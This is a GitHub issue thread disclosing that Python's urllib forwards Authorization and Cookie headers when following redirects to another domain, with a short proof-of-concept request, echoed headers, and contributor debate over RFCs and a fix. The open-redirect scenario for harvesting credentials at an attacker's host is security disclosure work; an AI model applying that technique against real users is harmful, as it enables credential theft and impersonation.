Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

urllib may leak sensitive HTTP headers to a third-party web site #77842

Open
artem-smotrakov mannequin opened this issue May 27, 2018 · 12 comments
Open

urllib may leak sensitive HTTP headers to a third-party web site #77842

artem-smotrakov mannequin opened this issue May 27, 2018 · 12 comments
Labels
stdlib Python modules in the Lib dir type-security A security issue

Comments

@artem-smotrakov
Copy link
Mannequin

artem-smotrakov mannequin commented May 27, 2018

BPO 33661
Nosy @orsenthil, @jwilk, @alex, @vadmium, @native-api, @artem-smotrakov, @eamanu, @kyoshidajp, @tirkarthi, @epicfaace
PRs
  • bpo-33661: Clear Authorization header when redirect to cross-site #11292
  • Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    Show more details

    GitHub fields:

    assignee = None
    closed_at = None
    created_at = <Date 2018-05-27.14:20:06.497>
    labels = ['type-security', 'library']
    title = 'urllib may leak sensitive HTTP headers to a third-party web site'
    updated_at = <Date 2019-08-14.04:01:33.275>
    user = 'https://github.com/artem-smotrakov'

    bugs.python.org fields:

    activity = <Date 2019-08-14.04:01:33.275>
    actor = 'epicfaace'
    assignee = 'none'
    closed = False
    closed_date = None
    closer = None
    components = ['Library (Lib)']
    creation = <Date 2018-05-27.14:20:06.497>
    creator = 'artem.smotrakov'
    dependencies = []
    files = []
    hgrepos = []
    issue_num = 33661
    keywords = ['patch']
    message_count = 11.0
    messages = ['317793', '317818', '317824', '318453', '319880', '332381', '332408', '332561', '332571', '332719', '349640']
    nosy_count = 10.0
    nosy_names = ['orsenthil', 'jwilk', 'alex', 'martin.panter', 'Ivan.Pozdeev', 'artem.smotrakov', 'eamanu', 'kyoshidajp', 'xtreak', 'epicfaace']
    pr_nums = ['11292']
    priority = 'normal'
    resolution = None
    stage = 'patch review'
    status = 'open'
    superseder = None
    type = 'security'
    url = 'https://bugs.python.org/issue33661'
    versions = ['Python 3.5']

    @artem-smotrakov
    Copy link
    Mannequin Author

    artem-smotrakov mannequin commented May 27, 2018

    After discussing it on security@python.org, it was decided to disclose it. Here is the original report:

    Hello Python Security Team,

    Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

    Let's consider the following environment:

    Let's then consider the following scenario:

    Here is what happens next:

    • urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
    • redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
    • urllib processes 301 code and makes a request to http://headers.gypsyengineer.com

    The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well.

    Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos),
    and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php
    If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com,
    then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them.
    As a result, the attacker can imporsonate the user on the original web site.

    Here is a simple POC which shows the problem:

    import urllib.request
    req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
    req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
    req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com');
    with urllib.request.urlopen(req) as f:
      print(f.read(2048).decode("utf-8"))

    Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers
    which are supposed to be sent only to httpleak.gypsyengineer.com:

    Hello, I am <b>headers.gypsyengineer.com</b></br></br>
    Here are HTTP headers you just sent me:</br></br>
    Accept-Encoding: identity</br>
    User-Agent: Python-urllib/3.8</br>
    <b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
    <b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
    Host: headers.gypsyengineer.com</br>
    Cache-Control: max-age=259200</br>
    Connection: keep-alive</br>

    I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython

    If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

    Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks!

    Artem

    @artem-smotrakov artem-smotrakov mannequin added stdlib Python modules in the Lib dir type-security A security issue labels May 27, 2018
    @native-api
    Copy link
    Mannequin

    native-api mannequin commented May 28, 2018

    According to https://stackoverflow.com/questions/1969709/how-to-forward-headers-on-http-redirect , there's nothing in the specs that mention (even the possibility) of any special request header processing.

    According to https://tools.ietf.org/html/rfc7231#section-6.4 , redirection targets are to be treated as effectively equal to the original URL.

    So, there aren't any grounds for the proposed filtering from web standards' POV.

    Neither are there from security POV:
    once you have given your credentials to a server, it is free to do whatever it wants with them. So, by giving them, you have effectively put down your signature that you trust the server with your data -- which implies trusting its advice where to resend it.
    The server could as well do that resending itself and passed you the end result. So, your proposed filtering does not actually achieve anything meaningful.1

    @artem-smotrakov
    Copy link
    Mannequin Author

    artem-smotrakov mannequin commented May 28, 2018

    Hi Ivan,

    Yes, unfortunately specs don't say anything about this scenario.

    once you have given your credentials to a server, it is free to do whatever it wants with them.

    I hope servers don't share this opinion :)

    So, your proposed filtering does not actually achieve anything meaningful.1

    I am sorry that I couldn't convice you. Thank you for your reply!

    @native-api
    Copy link
    Mannequin

    native-api mannequin commented Jun 1, 2018

    It's not about "convincing" me or anyone else. It's about showing how this will be a strict improvement.

    I showed that the HTTP RFC allows apps to rely on the fact that they are receiving all the headers. So filtering them arbitrarily violates the HTTP standard -- while the whole purpose of urllib is to conform to it (or it would not be able to reliably talk to HTTP servers).

    So, your suggestion is a disaster rather than improvement.

    @artem-smotrakov
    Copy link
    Mannequin Author

    artem-smotrakov mannequin commented Jun 18, 2018

    If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly discuss that all headers should be sent. I wish it did :)

    I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure).

    Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it

    https://tools.ietf.org/html/rfc6265#section-5.4

    curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't sent either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :)

    @kyoshidajp
    Copy link
    Mannequin

    kyoshidajp mannequin commented Dec 23, 2018

    Hi,

    I agree with this suggestion.

    First, section 6.4. "Redirection 3xx" of RFC 7231 doesn't explicitly explain whether to send all headers (including Authorization).

    I have confirmed that some third-party-library, tool, Programing Language and web browser did NOT forward the Authorization header at redirect.

    In other words, these are being on the safe side.

    Actually, HTTPBasicAuthHandler of urllib2 doesn't forward the Authorization header at redirect. If this suggestion is rejected, I think that it should be changed.

    @eamanu
    Copy link
    Mannequin

    eamanu mannequin commented Dec 24, 2018

    Hi!,

    Like say Katsuhiko YOSHIDA (#11292 (comment)) this should be filter other sensitive header. I think that is reasonable if we think on a complete solution to this issue.

    Maybe this issue could be apply on 3.5+ version?

    @httpsgithubcomxcainiao httpsgithubcomxcainiao mannequin changed the title urllib may leak sensitive HTTP headers to a third-party web site urllib may leak sensitive HTTP headers to a third-party web site1111 Dec 25, 2018
    @vadmium
    Copy link
    Member

    vadmium commented Dec 26, 2018

    Are you aware of the “add_unredirected_header” method? Maybe that is enough to avoid your problem.
    https://docs.python.org/dev/library/urllib.request.html#urllib.request.Request.add_unredirected_header

    @vadmium vadmium changed the title urllib may leak sensitive HTTP headers to a third-party web site1111 urllib may leak sensitive HTTP headers to a third-party web site Dec 26, 2018
    @kyoshidajp
    Copy link
    Mannequin

    kyoshidajp mannequin commented Dec 27, 2018

    Thanks. But I think the “add_unredirected_header” is not enough.

    These sensitive headers should be removed only when redirecting to cross-site automatically for security like HTTPBasicAuthHandler of urllib2. In order to fulfill this requirement, I think the operation should be in HTTPRedirectHandler.redirect_request.

    @kyoshidajp
    Copy link
    Mannequin

    kyoshidajp mannequin commented Dec 29, 2018

    According to RFC7235 (https://tools.ietf.org/html/rfc7235#section-4.1), WWW-Authenticate header is sent from server to client. And it has not credential data.

    Also, Cookie2 header is already obsoleted by RFC6295 (https://tools.ietf.org/html/rfc6265).

    So, I think that both "Authorization" and "Cookie" are enough.

    @epicfaace
    Copy link
    Mannequin

    epicfaace mannequin commented Aug 14, 2019

    Martin, are you okay with doing this? It seems like this issue has been the topic of a few CVEs (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20060, https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18074, https://curl.haxx.se/docs/CVE-2018-1000007.html) as well.

    @jwodder
    Copy link

    jwodder commented Dec 20, 2023

    I recently ran into an error caused by this behavior while using urllib in a program that intentionally eschews third-party libraries (and thus switching to requests is not an option). For the record, the current WHATWG standard states that the "Authorization" header is to be removed when following a cross-origin redirect.

    Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
    Labels
    stdlib Python modules in the Lib dir type-security A security issue
    Projects
    None yet
    Development

    No branches or pull requests

    2 participants